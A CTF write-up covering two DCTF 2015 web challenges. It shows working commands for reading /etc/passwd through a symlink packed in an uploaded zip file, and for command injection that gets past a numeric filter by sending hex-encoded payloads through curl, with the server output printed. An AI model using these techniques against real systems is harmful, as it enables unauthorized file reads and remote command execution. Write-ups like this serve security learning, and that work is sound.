********************
## [Web](#) *200*
by vic511
********************
First of all, the home page is explaining us the concept: it's an online tool where you can upload zip files, and explore freely their content. We can see in the source code something interesting:
```php
$shell = shell_exec("getent passwd dctf | cut -d: -f7"); ?>
```
Then we can suppose the server is running PHP under Linux, and we know what data should we be able to get. I uploaded some files containing special chars, in the zip file name or in the zipped files, but I had no significant results. The output of the command unzip archive.zip (the name of the uploaded file is renamed to archive.zip) may have been an attack vector, but I couldn't exploit it in any ways.
I've been looking on the web if I could zip symlinks, therefore I tried to access the content of `/etc/passwd` by zipping a symlink pointing to it.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ ln -s /etc/passwd passwd
```
Then zip it with the --symlinks option (otherwise it would just zip the content of your /etc/passwd).
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ zip --symlinks -r h.zip passwd
```
Now it's time to upload the malicious zip file. Once it's uploaded, the passwd file is not shown as existing, but don't worry, it's here.
All you have to do now is getting its content !
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.3/?id=xxx&file=./passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:105::/home/syslog:/bin/false
ubuntu:x:1000:1000::/home/ubuntu:/bin/bash
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
dctf:x:65533:65533:DCTF,,,:/nonexistent:/DCTF{28fad39245bc57404263540e94f417d8}
```
> The flag is DCTF{28fad39245bc57404263540e94f417d8} !
********************
## [Web](#) *400*
by vic511
********************
In this challenge, we can see an ugly web page showing images. Every image is linked with an user, and we can access them by giving parameters to index.php: http://10.13.37.5/?id=1&usr=1
I messed up with the parameters, and got an interesting information, the images are outputed through the linux command cat. I tried unsuccessfully to get a RCE, because the page was only accepting numeric values. I suddenly remembered that PHP is very flexible, and would consider strings such as `0xdeadbeef` as numeric.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.5/?usr=3&id=0xdeadbeef" -vvv
* Hostname was NOT found in DNS cache
* Trying 10.13.37.5...
* Connected to 10.13.37.5 (10.13.37.5) port 80 (#0)
> GET /?usr=3&id=0xdeadbeef HTTP/1.1
...
>
cat: images/ޭ��_269.jpg: No such file or directory
* Connection #0 to host 10.13.37.5 left intact
```
Very nice ! We can then bypass the filter and use hexadecimal strings to get a RCE ! I'm gonna use the xxd tool to generate the hexadecimal string, so the commands are gonna be human readable.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.5/?usr=3&id=0x$(echo "lol;ls -la 2>&1" | xxd -p)" -vvv
* Hostname was NOT found in DNS cache
* Trying 10.13.37.5...
* Connected to 10.13.37.5 (10.13.37.5) port 80 (#0)
> GET /?usr=3&id=0x6c6f6c3b6c73202d6c6120323e26310a HTTP/1.1
...
>
total 44
drwxr-xr-x 3 root root 4096 Oct 3 16:15 .
drwxr-xr-x 3 root root 4096 Oct 1 22:08 ..
-rw-r--r-- 1 root root 17 Oct 1 22:20 .htaccess
-rw-r--r-- 1 root root 38 Oct 1 22:14 6e8218531e0580b6754b3e3be5252873.txt
drwxrwxr-x 2 root root 4096 Oct 1 22:14 images
-rw-r--r-- 1 root root 21392 Oct 1 22:17 index.php
sh: 2: _269.jpg: not found
* Connection #0 to host 10.13.37.5 left intact
```
w00t ! Here we go, let's see what's inside this weird text file.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.5/?usr=3&id=0x$(echo "lol;cat 6*" | xxd -p)" -vvv
* Hostname was NOT found in DNS cache
* Trying 10.13.37.5...
* Connected to 10.13.37.5 (10.13.37.5) port 80 (#0)
> GET /?usr=3&id=0x6c6f6c3b63617420362a0a HTTP/1.1
...
>
DCTF{19b1f9f19688da85ec52a735c8da0dd3}sh: 2: _269.jpg: not found
* Connection #0 to host 10.13.37.5 left intact
```
> The flag is DCTF{19b1f9f19688da85ec52a735c8da0dd3} :)